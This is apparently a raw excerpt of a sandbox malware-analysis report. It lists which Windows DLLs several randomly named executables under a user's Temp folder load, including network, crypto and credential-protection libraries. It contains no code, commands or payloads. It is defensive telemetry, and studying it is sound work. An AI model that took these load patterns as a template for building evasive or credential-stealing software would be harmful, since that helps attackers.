Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: rasadhlp.dll
